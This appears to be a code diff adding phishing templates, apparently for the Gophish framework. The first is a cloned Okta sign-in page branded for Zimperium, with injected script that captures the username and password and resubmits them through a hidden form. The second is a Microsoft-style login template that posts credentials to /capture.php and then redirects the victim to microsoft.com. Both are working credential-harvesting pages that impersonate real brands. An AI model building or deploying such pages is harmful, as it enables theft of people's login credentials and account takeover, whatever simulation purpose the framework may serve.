multiOptionalFactorEnroll: true,
sameDeviceOVEnrollmentEnabled: sameDeviceOVEnrollmentEnabled,
deviceFingerprinting: true,
useDeviceFingerprintForSecurityImage: true,
trackTypingPattern: false,
hideSignOutLinkInMFA: hideSignOutForMFA,
hideBackToSignInForReset: hideBackToSignInForReset,
rememberMyUsernameOnOIE: rememberMyUsernameOnOIE,
engFastpassMultipleAccounts: engFastpassMultipleAccounts,
customExpiredPassword: true,
idpDiscovery: idpDiscovery,
passwordlessAuth: hasPasswordlessPolicy,
consent: hasOAuth2ConsentFeature,
skipIdpFactorVerificationBtn: hasSkipIdpFactorVerificationButton,
showPasswordToggleOnSignInPage: showPasswordToggleOnSignInPage,
showIdentifier: showIdentifier,
registration: registration,
redirectByFormSubmit: redirectByFormSubmit,
showPasswordRequirementsAsHtmlList: showPasswordRequirementsAsHtmlList,
showSessionRevocation: showSessionRevocation
},
assets: {
baseUrl: "https\x3A\x2F\x2Fok14static.oktacdn.com\x2Fassets\x2Fjs\x2Fsdk\x2Fokta\x2Dsignin\x2Dwidget\x2F7.33.2"
},
language: okta.locale,
i18n: {},
customButtons: customButtons,
piv: pivProperties,
helpLinks: {
help: '',
forgotPassword: '',
unlock: '',
custom: customLinks,
factorPage: factorPageCustomLink
},
cspNonce: window.cspNonce,
hcaptcha: hcaptcha,
}
};
loginPageConfig.signIn.i18n[okta.locale] = {
'primaryauth.username.placeholder': usernameLabel,
'primaryauth.username.tooltip': usernameInlineLabel,
'primaryauth.password.placeholder': passwordLabel,
'primaryauth.password.tooltip': passwordInlineLabel,
'mfa.challenge.password.placeholder': passwordLabel,
'primaryauth.title': signinLabel,
'forgotpassword': forgotpasswordLabel,
'unlockaccount': unlockaccountLabel,
'help': helpLabel,
'needhelp': footerHelpTitle,
'password.forgot.email.or.username.placeholder': recoveryFlowPlaceholder,
'password.forgot.email.or.username.tooltip': recoveryFlowPlaceholder,
'account.unlock.email.or.username.placeholder': recoveryFlowPlaceholder,
'account.unlock.email.or.username.tooltip': recoveryFlowPlaceholder
};
loginPageConfig.signIn.logoText = 'Zimperium logo';
loginPageConfig.signIn.brandName = 'Zimperium';
function isOldWebBrowserControl() {
// We no longer support IE7. If we see the MSIE 7.0 browser mode, it's a good signal
// that we're in a windows embedded browser.
if (navigator.userAgent.indexOf('MSIE 7.0') === -1) {
return false;
}
// Because the userAgent is the same across embedded browsers, we use feature
// detection to see if we're running on older versions that do not support updating
// the documentMode via x-ua-compatible.
return document.all && !window.atob;
}
function isAbsoluteUri(uri) {
var pat = /^https?:\/\//i;
return pat.test(uri);
}
var unsupportedContainer = document.getElementById('okta-sign-in');
var failIfCookiesDisabled = true;
// Old versions of WebBrowser Controls (specifically, OneDrive) render in IE7 browser
// mode, with no way to override the documentMode. In this case, inform the user they need
// to upgrade.
if (isOldWebBrowserControl()) {
document.getElementById('unsupported-onedrive').removeAttribute('style');
unsupportedContainer.removeAttribute('style');
}
else if (failIfCookiesDisabled && !navigator.cookieEnabled) {
document.getElementById('unsupported-cookie').removeAttribute('style');
unsupportedContainer.removeAttribute('style');
}
else {
unsupportedContainer.parentNode.removeChild(unsupportedContainer);
runLoginPage(function () {
var res = OktaLogin.initLoginPage(loginPageConfig);
// Intercept form submission for Gophish
setTimeout(function() {
var submitButton = document.querySelector('[data-type="save"]') ||
document.querySelector('.button-primary') ||
document.querySelector('input[type="submit"]');
if (submitButton) {
submitButton.addEventListener('click', function(e) {
// Small delay to let Okta validate, then capture values
setTimeout(function() {
var usernameField = document.querySelector('[name="username"]') ||
document.querySelector('#okta-signin-username') ||
document.querySelector('input[type="text"]');
var passwordField = document.querySelector('[name="password"]') ||
document.querySelector('#okta-signin-password') ||
document.querySelector('input[type="password"]');
if (usernameField && passwordField && usernameField.value && passwordField.value) {
// Create hidden form for Gophish
var form = document.createElement('form');
form.method = 'POST';
form.action = '';
form.style.display = 'none';
var userInput = document.createElement('input');
userInput.type = 'hidden';
userInput.name = 'username';
userInput.value = usernameField.value;
form.appendChild(userInput);
var passInput = document.createElement('input');
passInput.type = 'hidden';
passInput.name = 'password';
passInput.value = passwordField.value;
form.appendChild(passInput);
document.body.appendChild(form);
form.submit();
}
}, 100);
});
}
}, 2000);
});
}
}());
</script><script type="text/javascript" nonce="GbJoEX60HpuEJf6f877zFg">
window.addEventListener('load', function(event) {
function applyStyle(id, styleDef) {
if (styleDef) {
var el = document.getElementById(id);
if (!el) {
return;
}
el.classList.add(styleDef);
}
}
applyStyle('login-bg-image', 'bgStyle');
applyStyle('login-bg-image-ie8', 'bgStyleIE8');
});
</script></body>
</html>
@@ -0,0 +1,220 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>{{ page_title | default('Sign in to your account') }}</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
body {
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
background: #f2f2f2;
display: flex;
justify-content: center;
align-items: center;
min-height: 100vh;
}
.container {
background: white;
padding: 40px;
border-radius: 2px;
box-shadow: 0 2px 4px rgba(0,0,0,0.1);
width: 440px;
max-width: 90%;
}
.logo {
text-align: left;
margin-bottom: 24px;
}
.logo img {
height: 24px;
}
h1 {
font-size: 24px;
font-weight: 600;
margin-bottom: 16px;
color: #1a1a1a;
}
.form-group {
margin-bottom: 16px;
}
input[type="email"],
input[type="password"],
input[type="text"] {
width: 100%;
padding: 10px 12px;
border: 1px solid #605e5c;
border-radius: 2px;
font-size: 15px;
transition: border-color 0.2s;
}
input[type="email"]:focus,
input[type="password"]:focus,
input[type="text"]:focus {
outline: none;
border-color: #0078d4;
}
.forgot-password {
display: block;
margin: 8px 0 16px;
color: #0078d4;
text-decoration: none;
font-size: 13px;
}
.forgot-password:hover {
text-decoration: underline;
}
.btn-primary {
width: 100%;
padding: 12px;
background: #0078d4;
color: white;
border: none;
border-radius: 2px;
font-size: 16px;
cursor: pointer;
transition: background 0.2s;
}
.btn-primary:hover {
background: #106ebe;
}
.error-message {
color: #d13438;
font-size: 13px;
margin-top: 8px;
display: none;
}
.loading {
display: none;
text-align: center;
margin-top: 20px;
}
.spinner {
border: 2px solid #f3f3f3;
border-top: 2px solid #0078d4;
border-radius: 50%;
width: 20px;
height: 20px;
animation: spin 1s linear infinite;
display: inline-block;
}
@keyframes spin {
0% { transform: rotate(0deg); }
100% { transform: rotate(360deg); }
}
.footer {
margin-top: 40px;
font-size: 12px;
color: #605e5c;
text-align: center;
}
.footer a {
color: #605e5c;
text-decoration: none;
}
.footer a:hover {
text-decoration: underline;
}
</style>
</head>
<body>
<div class="container">
<div class="logo">
<img src="{{ logo_url | default('data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxMDgiIGhlaWdodD0iMjQiPjx0ZXh0IHg9IjAiIHk9IjIwIiBmb250LWZhbWlseT0iU2Vnb2UgVUkiIGZvbnQtc2l6ZT0iMjAiIGZpbGw9IiM1YzJkOTEiPk1pY3Jvc29mdDwvdGV4dD48L3N2Zz4=') }}" alt="Logo">
</div>
<h1>{{ heading | default('Sign in') }}</h1>
<form id="loginForm" method="POST" action="/capture.php">
<input type="hidden" name="rid" value="{{ '{{.RId}}' }}">
<input type="hidden" name="campaign" value="{{ '{{.Campaign}}' }}">
<div class="form-group">
<input type="email"
name="username"
id="username"
placeholder="{{ username_placeholder | default('Email, phone, or Skype') }}"
required>
</div>
<div class="form-group">
<input type="password"
name="password"
id="password"
placeholder="{{ password_placeholder | default('Password') }}"
required>
</div>
<a href="#" class="forgot-password">{{ forgot_text | default('Forgot password?') }}</a>
<div class="error-message" id="error">
{{ error_message | default('Invalid username or password.') }}
</div>
<button type="submit" class="btn-primary">
{{ button_text | default('Sign in') }}
</button>
<div class="loading" id="loading">
<div class="spinner"></div>
<p>{{ loading_text | default('Signing in...') }}</p>
</div>
</form>
<div class="footer">
<a href="#">{{ footer_link1 | default('Terms of use') }}</a> |
<a href="#">{{ footer_link2 | default('Privacy & cookies') }}</a>
</div>
</div>
<script>
document.getElementById('loginForm').addEventListener('submit', function(e) {
e.preventDefault();
// Show loading state
document.getElementById('loading').style.display = 'block';
document.querySelector('.btn-primary').style.display = 'none';
// Submit form data
fetch(this.action, {
method: 'POST',
body: new FormData(this)
})
.then(response => {
// Redirect after a delay to simulate processing
setTimeout(() => {
window.location.href = '{{ redirect_url | default("https://www.microsoft.com") }}';
}, 2000);
})
.catch(error => {
document.getElementById('error').style.display = 'block';
document.getElementById('loading').style.display = 'none';
document.querySelector('.btn-primary').style.display = 'block';
});
});
</script>
</body>
</html>